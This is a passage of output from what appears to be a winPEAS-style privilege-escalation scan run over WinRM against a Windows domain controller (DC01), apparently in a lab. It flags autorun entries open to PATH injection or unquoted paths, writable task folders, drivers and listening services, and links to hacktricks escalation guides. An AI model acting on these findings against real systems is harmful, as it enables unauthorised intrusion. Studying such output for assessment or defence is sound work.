WINRM       172.16.55.128   5985   DC01                =================================================================================================
1211
WINRM       172.16.55.128   5985   DC01
1212
WINRM       172.16.55.128   5985   DC01
1213
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1214
WINRM       172.16.55.128   5985   DC01                 Key: MSCTF
1215
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1216
WINRM       172.16.55.128   5985   DC01                 File: MSCTF.dll
1217
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1218
WINRM       172.16.55.128   5985   DC01
1219
WINRM       172.16.55.128   5985   DC01
1220
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1221
WINRM       172.16.55.128   5985   DC01                 Key: MSVCRT
1222
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1223
WINRM       172.16.55.128   5985   DC01                 File: MSVCRT.dll
1224
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1225
WINRM       172.16.55.128   5985   DC01
1226
WINRM       172.16.55.128   5985   DC01
1227
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1228
WINRM       172.16.55.128   5985   DC01                 Key: NORMALIZ
1229
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1230
WINRM       172.16.55.128   5985   DC01                 File: NORMALIZ.dll
1231
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1232
WINRM       172.16.55.128   5985   DC01
1233
WINRM       172.16.55.128   5985   DC01
1234
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1235
WINRM       172.16.55.128   5985   DC01                 Key: NSI
1236
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1237
WINRM       172.16.55.128   5985   DC01                 File: NSI.dll
1238
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1239
WINRM       172.16.55.128   5985   DC01
1240
WINRM       172.16.55.128   5985   DC01
1241
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1242
WINRM       172.16.55.128   5985   DC01                 Key: ole32
1243
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1244
WINRM       172.16.55.128   5985   DC01                 File: ole32.dll
1245
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1246
WINRM       172.16.55.128   5985   DC01
1247
WINRM       172.16.55.128   5985   DC01
1248
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1249
WINRM       172.16.55.128   5985   DC01                 Key: OLEAUT32
1250
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1251
WINRM       172.16.55.128   5985   DC01                 File: OLEAUT32.dll
1252
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1253
WINRM       172.16.55.128   5985   DC01
1254
WINRM       172.16.55.128   5985   DC01
1255
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1256
WINRM       172.16.55.128   5985   DC01                 Key: PSAPI
1257
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1258
WINRM       172.16.55.128   5985   DC01                 File: PSAPI.DLL
1259
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1260
WINRM       172.16.55.128   5985   DC01
1261
WINRM       172.16.55.128   5985   DC01
1262
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1263
WINRM       172.16.55.128   5985   DC01                 Key: rpcrt4
1264
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1265
WINRM       172.16.55.128   5985   DC01                 File: rpcrt4.dll
1266
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1267
WINRM       172.16.55.128   5985   DC01
1268
WINRM       172.16.55.128   5985   DC01
1269
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1270
WINRM       172.16.55.128   5985   DC01                 Key: sechost
1271
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1272
WINRM       172.16.55.128   5985   DC01                 File: sechost.dll
1273
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1274
WINRM       172.16.55.128   5985   DC01
1275
WINRM       172.16.55.128   5985   DC01
1276
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1277
WINRM       172.16.55.128   5985   DC01                 Key: Setupapi
1278
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1279
WINRM       172.16.55.128   5985   DC01                 File: Setupapi.dll
1280
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1281
WINRM       172.16.55.128   5985   DC01
1282
WINRM       172.16.55.128   5985   DC01
1283
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1284
WINRM       172.16.55.128   5985   DC01                 Key: SHCORE
1285
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1286
WINRM       172.16.55.128   5985   DC01                 File: SHCORE.dll
1287
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1288
WINRM       172.16.55.128   5985   DC01
1289
WINRM       172.16.55.128   5985   DC01
1290
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1291
WINRM       172.16.55.128   5985   DC01                 Key: SHELL32
1292
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1293
WINRM       172.16.55.128   5985   DC01                 File: SHELL32.dll
1294
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1295
WINRM       172.16.55.128   5985   DC01
1296
WINRM       172.16.55.128   5985   DC01
1297
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1298
WINRM       172.16.55.128   5985   DC01                 Key: SHLWAPI
1299
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1300
WINRM       172.16.55.128   5985   DC01                 File: SHLWAPI.dll
1301
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1302
WINRM       172.16.55.128   5985   DC01
1303
WINRM       172.16.55.128   5985   DC01
1304
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1305
WINRM       172.16.55.128   5985   DC01                 Key: user32
1306
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1307
WINRM       172.16.55.128   5985   DC01                 File: user32.dll
1308
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1309
WINRM       172.16.55.128   5985   DC01
1310
WINRM       172.16.55.128   5985   DC01
1311
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1312
WINRM       172.16.55.128   5985   DC01                 Key: WLDAP32
1313
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1314
WINRM       172.16.55.128   5985   DC01                 File: WLDAP32.dll
1315
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1316
WINRM       172.16.55.128   5985   DC01
1317
WINRM       172.16.55.128   5985   DC01
1318
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1319
WINRM       172.16.55.128   5985   DC01                 Key: wow64
1320
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1321
WINRM       172.16.55.128   5985   DC01                 File: wow64.dll
1322
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1323
WINRM       172.16.55.128   5985   DC01
1324
WINRM       172.16.55.128   5985   DC01
1325
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1326
WINRM       172.16.55.128   5985   DC01                 Key: wow64base
1327
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1328
WINRM       172.16.55.128   5985   DC01                 File: wow64base.dll
1329
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1330
WINRM       172.16.55.128   5985   DC01
1331
WINRM       172.16.55.128   5985   DC01
1332
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1333
WINRM       172.16.55.128   5985   DC01                 Key: wow64con
1334
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1335
WINRM       172.16.55.128   5985   DC01                 File: wow64con.dll
1336
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1337
WINRM       172.16.55.128   5985   DC01
1338
WINRM       172.16.55.128   5985   DC01
1339
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1340
WINRM       172.16.55.128   5985   DC01                 Key: wow64win
1341
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1342
WINRM       172.16.55.128   5985   DC01                 File: wow64win.dll
1343
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1344
WINRM       172.16.55.128   5985   DC01
1345
WINRM       172.16.55.128   5985   DC01
1346
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1347
WINRM       172.16.55.128   5985   DC01                 Key: WS2_32
1348
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1349
WINRM       172.16.55.128   5985   DC01                 File: WS2_32.dll
1350
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1351
WINRM       172.16.55.128   5985   DC01
1352
WINRM       172.16.55.128   5985   DC01
1353
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
1354
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1355
WINRM       172.16.55.128   5985   DC01                 Folder: \
1356
WINRM       172.16.55.128   5985   DC01                 FolderPerms: Users [Allow: AppendData/CreateDirectories]
1357
WINRM       172.16.55.128   5985   DC01                 File: /UserInstall
1358
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1359
WINRM       172.16.55.128   5985   DC01
1360
WINRM       172.16.55.128   5985   DC01
1361
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
1362
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1363
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\system32
1364
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\system32\unregmp2.exe /FirstLogon
1365
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1366
WINRM       172.16.55.128   5985   DC01
1367
WINRM       172.16.55.128   5985   DC01
1368
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}
1369
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1370
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1371
WINRM       172.16.55.128   5985   DC01                 File: U
1372
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1373
WINRM       172.16.55.128   5985   DC01
1374
WINRM       172.16.55.128   5985   DC01
1375
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}
1376
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1377
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
1378
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\ie4uinit.exe -UserConfig
1379
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1380
WINRM       172.16.55.128   5985   DC01
1381
WINRM       172.16.55.128   5985   DC01
1382
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
1383
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1384
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
1385
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install
1386
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1387
WINRM       172.16.55.128   5985   DC01
1388
WINRM       172.16.55.128   5985   DC01
1389
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}
1390
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1391
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\Installer
1392
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\Installer\setup.exe --configure-user-settings --verbose-logging --system-level --msedge --channel=stable (Unquoted and Space detected) - C:\
1393
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1394
WINRM       172.16.55.128   5985   DC01
1395
WINRM       172.16.55.128   5985   DC01
1396
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}
1397
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1398
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
1399
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\rundll32.exe C:\Windows\System32\iesetup.dll,IEHardenAdmin
1400
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1401
WINRM       172.16.55.128   5985   DC01
1402
WINRM       172.16.55.128   5985   DC01
1403
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}
1404
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1405
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
1406
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\rundll32.exe C:\Windows\System32\iesetup.dll,IEHardenUser
1407
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1408
WINRM       172.16.55.128   5985   DC01
1409
WINRM       172.16.55.128   5985   DC01
1410
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
1411
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1412
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\system32
1413
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\system32\unregmp2.exe /FirstLogon
1414
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1415
WINRM       172.16.55.128   5985   DC01
1416
WINRM       172.16.55.128   5985   DC01
1417
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
1418
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
1419
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\SysWOW64
1420
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
1421
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1422
WINRM       172.16.55.128   5985   DC01
1423
WINRM       172.16.55.128   5985   DC01
1424
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}
1425
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\BHO
1426
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\BHO\ie_to_edge_bho_64.dll (Unquoted and Space detected) - C:\
1427
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1428
WINRM       172.16.55.128   5985   DC01
1429
WINRM       172.16.55.128   5985   DC01
1430
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}
1431
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\BHO
1432
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\BHO\ie_to_edge_bho_64.dll (Unquoted and Space detected) - C:\
1433
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1434
WINRM       172.16.55.128   5985   DC01
1435
WINRM       172.16.55.128   5985   DC01
1436
WINRM       172.16.55.128   5985   DC01                 Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
1437
WINRM       172.16.55.128   5985   DC01                 File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
1438
WINRM       172.16.55.128   5985   DC01                 Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
1439
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1440
WINRM       172.16.55.128   5985   DC01
1441
WINRM       172.16.55.128   5985   DC01
1442
WINRM       172.16.55.128   5985   DC01                 Folder: C:\windows\tasks
1443
WINRM       172.16.55.128   5985   DC01                 FolderPerms: Authenticated Users [Allow: WriteData/CreateFiles]
1444
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1445
WINRM       172.16.55.128   5985   DC01
1446
WINRM       172.16.55.128   5985   DC01
1447
WINRM       172.16.55.128   5985   DC01                 Folder: C:\windows\system32\tasks
1448
WINRM       172.16.55.128   5985   DC01                 FolderPerms: Authenticated Users [Allow: WriteData/CreateFiles]
1449
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1450
WINRM       172.16.55.128   5985   DC01
1451
WINRM       172.16.55.128   5985   DC01
1452
WINRM       172.16.55.128   5985   DC01                 Folder: C:\windows
1453
WINRM       172.16.55.128   5985   DC01                 File: C:\windows\system.ini
1454
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1455
WINRM       172.16.55.128   5985   DC01
1456
WINRM       172.16.55.128   5985   DC01
1457
WINRM       172.16.55.128   5985   DC01                 Folder: C:\windows
1458
WINRM       172.16.55.128   5985   DC01                 File: C:\windows\win.ini
1459
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1460
WINRM       172.16.55.128   5985   DC01
1461
WINRM       172.16.55.128   5985   DC01
1462
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Scheduled Applications --Non Microsoft--
1463
WINRM       172.16.55.128   5985   DC01             È Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
1464
WINRM       172.16.55.128   5985   DC01
1465
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Device Drivers --Non Microsoft--
1466
WINRM       172.16.55.128   5985   DC01             È Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#drivers
1467
WINRM       172.16.55.128   5985   DC01                 VMware vSockets Service - 9.8.19.0 build-18956547 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys
1468
WINRM       172.16.55.128   5985   DC01                 VMware Raw Disk Helper Driver - 1.1.7.0 build-18933738 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmrawdsk.sys
1469
WINRM       172.16.55.128   5985   DC01                 VMware Pointing PS/2 Device Driver - 12.5.12.0 build-18967789 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys
1470
WINRM       172.16.55.128   5985   DC01                 Intel(R) PRO/1000 Adapter - 8.4.13.0 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\E1G6032E.sys
1471
WINRM       172.16.55.128   5985   DC01                 VMware server memory controller - 7.5.7.0 build-18933738 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys
1472
WINRM       172.16.55.128   5985   DC01
1473
WINRM       172.16.55.128   5985   DC01
1474
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Network Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
1475
WINRM       172.16.55.128   5985   DC01
1476
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Network Shares
1477
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied
1478
WINRM       172.16.55.128   5985   DC01
1479
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerate Network Mapped Drives (WMI)
1480
WINRM       172.16.55.128   5985   DC01
1481
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Host File
1482
WINRM       172.16.55.128   5985   DC01
1483
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Network Ifaces and known hosts
1484
WINRM       172.16.55.128   5985   DC01             È The masks are only for the IPv4 addresses
1485
WINRM       172.16.55.128   5985   DC01                 Ethernet[08:00:27:2F:A0:3B]: 172.16.55.128, fe80::c833:192d:dba0:737%4 / 255.255.252.0
1486
WINRM       172.16.55.128   5985   DC01                     Gateways: 172.16.52.1
1487
WINRM       172.16.55.128   5985   DC01                     DNSs: 114.114.114.114, 114.114.115.115
1488
WINRM       172.16.55.128   5985   DC01                     Known hosts:
1489
WINRM       172.16.55.128   5985   DC01                       10.0.2.2              00-00-00-00-00-00     Invalid
1490
WINRM       172.16.55.128   5985   DC01                       169.254.169.254       00-00-00-00-00-00     Invalid
1491
WINRM       172.16.55.128   5985   DC01                       172.16.52.1           00-74-9C-E6-DF-52     Dynamic
1492
WINRM       172.16.55.128   5985   DC01                       172.16.55.128          00-00-00-00-00-00     Invalid
1493
WINRM       172.16.55.128   5985   DC01                       172.16.55.193         00-0C-29-3D-0E-6F     Dynamic
1494
WINRM       172.16.55.128   5985   DC01                       172.16.55.255         FF-FF-FF-FF-FF-FF     Static
1495
WINRM       172.16.55.128   5985   DC01                       224.0.0.22            01-00-5E-00-00-16     Static
1496
WINRM       172.16.55.128   5985   DC01                       224.0.0.251           01-00-5E-00-00-FB     Static
1497
WINRM       172.16.55.128   5985   DC01                       224.0.0.252           01-00-5E-00-00-FC     Static
1498
WINRM       172.16.55.128   5985   DC01                       255.255.255.255       FF-FF-FF-FF-FF-FF     Static
1499
WINRM       172.16.55.128   5985   DC01
1500
WINRM       172.16.55.128   5985   DC01                 Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
1501
WINRM       172.16.55.128   5985   DC01                     DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
1502
WINRM       172.16.55.128   5985   DC01                     Known hosts:
1503
WINRM       172.16.55.128   5985   DC01                       224.0.0.22            00-00-00-00-00-00     Static
1504
WINRM       172.16.55.128   5985   DC01
1505
WINRM       172.16.55.128   5985   DC01
1506
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current TCP Listening Ports
1507
WINRM       172.16.55.128   5985   DC01             È Check for services restricted from the outside
1508
WINRM       172.16.55.128   5985   DC01               Enumerating IPv4 connections
1509
WINRM       172.16.55.128   5985   DC01
1510
WINRM       172.16.55.128   5985   DC01               Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name
1511
WINRM       172.16.55.128   5985   DC01
1512
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               88            0.0.0.0               0               Listening         652             lsass
1513
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               135           0.0.0.0               0               Listening         932             svchost
1514
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               389           0.0.0.0               0               Listening         652             lsass
1515
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
1516
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               464           0.0.0.0               0               Listening         652             lsass
1517
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               593           0.0.0.0               0               Listening         932             svchost
1518
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               636           0.0.0.0               0               Listening         652             lsass
1519
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               1433          0.0.0.0               0               Listening         4476            sqlservr
1520
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               3268          0.0.0.0               0               Listening         652             lsass
1521
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               3269          0.0.0.0               0               Listening         652             lsass
1522
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
1523
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               9389          0.0.0.0               0               Listening         2916            Microsoft.ActiveDirectory.WebServices
1524
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System
1525
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49664         0.0.0.0               0               Listening         652             lsass
1526
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49665         0.0.0.0               0               Listening         496             wininit
1527
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49666         0.0.0.0               0               Listening         1224            svchost
1528
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49667         0.0.0.0               0               Listening         1704            svchost
1529
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49668         0.0.0.0               0               Listening         652             lsass
1530
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49677         0.0.0.0               0               Listening         652             lsass
1531
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49678         0.0.0.0               0               Listening         2784            spoolsv
1532
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49681         0.0.0.0               0               Listening         640             services
1533
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49691         0.0.0.0               0               Listening         2880            certsrv
1534
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49705         0.0.0.0               0               Listening         2936            dns
1535
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49761         0.0.0.0               0               Listening         2896            dfsrs
1536
WINRM       172.16.55.128   5985   DC01               TCP        127.0.0.1             53            0.0.0.0               0               Listening         2936            dns
1537
WINRM       172.16.55.128   5985   DC01               TCP        127.0.0.1             1434          0.0.0.0               0               Listening         4476            sqlservr
1538
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         53            0.0.0.0               0               Listening         2936            dns
1539
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         139           0.0.0.0               0               Listening         4               System
1540
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         445           172.16.55.193         54476           Established       4               System
1541
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         445           172.16.55.193         55438           Established       4               System
1542
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         35720           Established       4476            sqlservr
1543
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         38112           Established       4476            sqlservr
1544
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         39144           Established       4476            sqlservr
1545
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         49774           Established       4476            sqlservr
1546
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         55852           Established       4476            sqlservr
1547
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         56146           Established       4476            sqlservr
1548
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         56550           Established       4476            sqlservr
1549
WINRM       172.16.55.128   5985   DC01
1550
WINRM       172.16.55.128   5985   DC01               Enumerating IPv6 connections
1551
WINRM       172.16.55.128   5985   DC01
1552
WINRM       172.16.55.128   5985   DC01               Protocol   Local Address                               Local Port    Remote Address                              Remote Port     State             Process ID      Process Name
1553
WINRM       172.16.55.128   5985   DC01
1554
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        88            [::]                                        0               Listening         652             lsass
1555
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        135           [::]                                        0               Listening         932             svchost
1556
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        389           [::]                                        0               Listening         652             lsass
1557
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        445           [::]                                        0               Listening         4               System
1558
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        464           [::]                                        0               Listening         652             lsass
1559
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        593           [::]                                        0               Listening         932             svchost
1560
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        636           [::]                                        0               Listening         652             lsass
1561
